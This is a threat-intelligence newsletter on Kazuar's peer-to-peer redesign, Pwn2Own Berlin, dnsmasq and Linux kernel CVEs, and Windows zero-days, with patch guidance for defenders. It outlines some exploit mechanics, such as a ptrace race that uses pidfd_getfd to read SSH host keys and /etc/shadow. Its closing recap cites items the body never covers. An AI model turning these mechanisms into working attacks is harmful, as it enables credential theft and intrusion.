The Lyceum: Cyber Intelligence Daily — May 17, 2026

Three things matter today, and they're all variations of the same theme: the floor keeps getting lower. Russia's Turla has rebuilt its Kazuar backdoor as a stealth peer-to-peer botnet — most infected machines never talk to the internet at all. Pwn2Own Berlin closed Saturday with 47 zero-days, $1,298,250 in payouts, and DEVCORE crowned Master of Pwn with $505,000 after chaining bugs through Edge, Exchange, and SharePoint. And the Linux kernel just shipped its fourth disclosed vulnerability in three weeks — this one hands any local user your SSH host keys.

The unifying signal: things we treated as hard problems — endpoint detection, hardware-tagged memory, kernel privilege boundaries — are absorbing real damage. Patch fast and assume less.

• CVE-2026-20182 — Cisco Catalyst SD-WAN Controller & Manager: authentication bypass, actively exploited, on CISA KEV with the federal remediation deadline expiring Sunday evening. Canada's Centre for Cyber Security issued AL26-012 urging immediate patching.
• CVE-2026-42897 — Microsoft Exchange Server (on-prem) OWA cross-site scripting: actively exploited via crafted email, CISA KEV due date 2026-05-29. Microsoft is pushing mitigations through Exchange Emergency Mitigation Service while a full patch is prepared.
• CVE-2026-42945 — NGINX ngx_http_rewrite_module: 18-year-old heap-based buffer overflow with public proof-of-concept now circulating; no NVD score yet. Russian outlet Xakep reports the PoC lowers the bar to remote code execution.
• CVE-2026-46333 "ssh-keysign-pwn" — Linux kernel ptrace exit-race: unprivileged local users can read SSH host keys and /etc/shadow. Patched kernels released May 15; working PoC published by researcher "_SiCk" hours after the fix.
• CVE-2026-46300 "Fragnesia" — Linux kernel XFRM ESP-in-TCP local root: public PoC available, distributions shipping fixes.
• Six dnsmasq CVEs — CVE-2026-2291, 4890, 4891, 4892, 4893, 5172 covering cache poisoning, memory disclosure, denial of service, and local root via DHCPv6. Fixed in dnsmasq 2.92rel2.
• Apache HertzBeat 1.8.0 unauthenticated RCE: working PoC on Exploit-DB targeting an input validation flaw in a web endpoint. Vendor has released 1.8.1/1.8.2; thousands of instances exposed on Shodan.

Your endpoint detection tools assume malware talks to the internet. Kazuar's new design specifically defeats that assumption, and Microsoft just published the blueprint.

Turla — which CISA assesses to be affiliated with Center 16 of Russia's FSB, and which Microsoft tracks as Secret Blizzard — has rebuilt its custom Kazuar backdoor as a modular peer-to-peer botnet engineered for long-term, near-invisible access. The architecture splits into three components (Kernel, Bridge, Worker) and elects a single "leader" host per cluster of compromised machines. Only the leader speaks to command-and-control infrastructure. Every other infected system operates in silent mode, passing data internally. In a network with a dozen infected machines, exactly one generates suspicious outbound traffic.

Per Microsoft's writeup, Kazuar now supports 150 configuration options governing security bypasses, scheduling, exfiltration chunk sizing, and process injection. Microsoft's threat intelligence places Turla's historical targets in government and diplomatic sectors across Europe and Central Asia, with notable piggybacking onto systems in Ukraine previously compromised by Aqua Blizzard (also known as Gamaredon).

What changes if this succeeds: signature-based detection becomes near-useless against this family, and the cost of internal-only command traffic shifts the entire defender economics. What failure looks like: Microsoft's behavioral indicators get baked into EDR products quickly, and the leader-election pattern becomes a detection primitive rather than a stealth advantage. Watch whether your EDR vendor pushes Kazuar-specific behavioral rules within the next two weeks — that's the signal.

If you cleaned up a Gamaredon infection in the past two years, look again.

The world's most prestigious hacking competition wrapped Saturday, and the bill for Microsoft, VMware, and a dozen other vendors just came due. Per Zero Day Initiative's final results: $1,298,250 awarded for 47 unique zero-days across three days, with DEVCORE crowned Master of Pwn at 50.5 points and $505,000.

The story of the event is DEVCORE's Orange Tsai. On day one, he chained four logic bugs to escape Microsoft Edge's sandbox for $175,000. On day two, he chained three bugs into Microsoft Exchange to get remote code execution as SYSTEM for $200,000 — fully patched Exchange, falling to a chain that now starts a 90-day disclosure timer. STARLabs SG used memory corruption to exploit VMware ESXi with a cross-tenant code execution add-on for another $200,000 on day three.

The newer storyline is AI infrastructure. Researchers successfully attacked LiteLLM, NVIDIA Megatron Bridge, OpenAI Codex, Chroma, and LM Studio — the actual production tools companies are deploying to run AI workloads, all fully patched, all falling to chained exploits.

What changes if vendors patch quickly: the 47 zero-days become a coordinated cleanup. What failure looks like: Pwn2Own organizers reported the event hit capacity for the first time in its 19-year history, with researchers turned away — some of whom may drop bugs publicly rather than wait until next year. Watch security research social channels for uncoordinated PoC releases targeting products on the Berlin target list, and treat any Exchange server as a higher-priority patching target until Microsoft ships out-of-band fixes before mid-August.

dnsmasq doesn't have a marketing team. It just quietly runs DNS and DHCP on hundreds of millions of devices — home routers, enterprise edge gear, Linux servers, Raspberry Pis — and it just got six vulnerabilities at once.

CERT/CC's VU#471747 documents the lot: CVE-2026-2291, 4890, 4891, 4892, 4893, and 5172. The collective impact spans denial of service, cache poisoning and silent redirection of users to attacker-controlled domains, memory disclosure, and a local privilege escalation path to root via DHCPv6 manipulation. DNS cache poisoning is the one to picture clearly: an attacker can make your device believe yourbank.com lives at an IP address they control. You type the right URL; you get the wrong website.

Per the oss-security disclosure, these are long-standing bugs that apply to essentially all non-ancient versions. Upstream maintainer Simon Kelley shipped 2.92rel2 to address them. In the Dnsmasq-discuss disclosure post, Kelley flagged something worth pausing on: there's been "something of a revolution in AI-based security research," and given how many bugs the good guys have surfaced, there's "no doubt" the bad guys have done the same.

What changes if router vendors patch quickly: mostly invisible plumbing fix, nobody notices. What failure looks like: vendor firmware updates lag months while embedded devices in homes and small offices sit exposed. If your router vendor hasn't shipped a firmware update within 2-4 weeks, assume it's still vulnerable and consider blocking DNS manipulation at the network perimeter.

On May 14, Qualys's Threat Research Unit disclosed CVE-2026-46333, dubbed "ssh-keysign-pwn" — a Linux kernel logic flaw letting any unprivileged local user read root-owned files including SSH host private keys and /etc/shadow. Hours after the upstream fix landed, researcher _SiCk published two working exploits: one that reads /etc/ssh/ssh_host_*_key via ssh-keysign, one that reads /etc/shadow via chage -l. Per AlmaLinux's writeup, the mechanism is a ptrace exit-race: between detaching a task's memory descriptor and closing its file descriptor table, the kernel skips its dumpable safeguard, and an unprivileged process can call pidfd_getfd(2) to copy descriptors out of an exiting privileged process.

Most coverage is getting one thing wrong: the mitigations from the previous three Linux kernel vulnerabilities this month — Copy Fail, Dirty Frag, Fragnesia — do not apply here. Those were addressed by blacklisting esp4, esp6, algif_aead, and related modules. CVE-2026-46333 uses none of those code paths. A server with all three previous mitigations applied is still fully exposed.

Per 9to5Linux, patched kernels are available as of May 15: 7.0.8, 6.18.31, 6.12.89, 6.6.139, 6.1.173, 5.15.207, and 5.10.256.

What changes if you patch immediately: key rotation hassle, then back to normal. What failure looks like: because this is an information disclosure bug with a six-year backdating, treat SSH host keys and /etc/shadow as potentially compromised on any internet-reachable server that allowed shell access for non-trusted users before the mitigation was applied. The observable signal that this is being exploited at scale will be a wave of stolen-credential intrusions over the coming weeks. Update, reboot, rotate.

Xakep reports that researcher "Chaotic Eclipse" (also known as Nightmare-Eclipse) has published exploit code for two unpatched Windows zero-days: YellowKey, a BitLocker bypass affecting Windows 11 and Windows Server 2022/2025 that abuses Windows Recovery Environment behavior via USB, and GreenPlasma, a local privilege escalation to SYSTEM. The article cites independent confirmation from named researcher Will Dormann that the USB-based YellowKey attack works as described. Public PoC plus third-party validation changes the temperature for any environment that treats BitLocker as the final word on a lost or seized laptop. No Microsoft advisory or mitigation guidance has surfaced yet. Source: Xakep.ru — Russian. No English-language coverage confirmed at time of publication.

CERT-UA bulletin describes spearphishing with password-protected ZIPs dropping LNK and JS files that invoke powershell.exe and mshta.exe, paired with a lightweight backdoor that beacons via Telegram and public cloud storage. Same Living-off-the-Land pattern as the UAC-0247 hospital campaign last week — Telegram-as-C2 is the throughline. Source: CERT-UA — Ukrainian. No English-language coverage confirmed at time of publication.

CERT-UA's writeup of the UAC-0247 cluster (also tracked as UAC-0244) describes a campaign that simultaneously targets Ukrainian hospitals, organs of local government, and operators of FPV drones — a sector combination consistent with Russian intelligence priorities, though CERT-UA stops short of formal attribution. Defensive recommendations include restricting LNK, HTA, and JS execution on endpoints and limiting mshta.exe, powershell.exe, and wscript.exe. Source: CERT-UA — Ukrainian. No English-language coverage confirmed at time of publication.

A Russian backdoor that whispers instead of dials home, an 18-year-old NGINX bug found by a chatbot, and Orange Tsai walking out of Berlin $375,000 richer with a SYSTEM shell on a fully patched Exchange server. Somewhere in Cupertino, an engineer is reading 55 pages explaining how the chip they spent five years tagging got bypassed by a piece of software that's been out of preview for two months.

Patch what you can, rotate what you must, sleep when you can.

If you know someone running on-prem Exchange or a Linux fleet, forward this — they'll want the 24 hours back.